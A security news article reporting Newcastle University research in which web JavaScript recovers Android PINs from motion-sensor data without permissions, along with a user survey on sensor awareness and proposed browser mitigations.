With each new generation of smartphone, manufacturers are adding more and more sensors to enhance the user’s experience, but this also means that more and more apps are asking for blanket permission to use those sensors. This proliferation of sensors and permissions is creating serious privacy and security issues, as researchers at Newcastle University established with a new attack the can recover a user’s four-digit phone PIN 94 percent of the time by measuring the output from an Android device’s motion and orientation sensors.
Modern mobile devices include a number of different sensors, such as accelerometers, GPS sensors, and many others. Lots of apps use these for legitimate purposes, including geolocation, measuring speed and direction, and sensing ambient light. But some apps and websites abuse these sensors to gather information about a user’s location activities. In their paper, the Newcastle University researchers also report the results of a study that measured the public’s perceptions of mobile sensor stacks and came back with a universal result that people were not away of the sensors on their mobile phones and other devices. And more importantly, they found that users are not concerned about these sensors.
The study surveyed more than 100 people and found that many of the sensors didn’t cause any concern for most users, with the exception of fingerprint sensors. The results (seen below) show that most users aren’t much concerned with the risk of most of the sensors in their mobile devices.
The attack that the researchers developed using PINlogger.js relies on output from a number of different sensors in a target Android device. It assumes that the victim is using a digit-only PIN typed on a soft keyboard on a screen.
“Unlike similar works which have to gain the access through an installed app, our attack does not require any user permission. Instead, we assume that the user has loaded the malicious web content in the form of an iframe, or another tab while working with the mobile browser. At this point, the attack code has already started listening to the sensor sequences from the user’s interaction with the phone,” the paper says.
At the present time, there does not seem to be a solution for the problem. The paper does come forward with a suggestion: “Having control on granting access before opening a website and during working with it, in combination with a smart notification feature in the browser would probably achieve a balance between security and usability.” This is similar to many other mobile applications where a user must grant an application access to give the user notifications or use his location.
Maryam Mehrnezhad, one of the paper’s authors, said via email that the problem will get more serious over time.
“When smart kitchens, smart homes, smart buildings, and smart cities are equipped with multiple sensor-enabled devices connected via IoT,” Mehrnezhad said, “these devices will be constantly sensing people and their surroundings and broadcasting this information. If sensors are not securely managed, the threat is going to be much bigger.”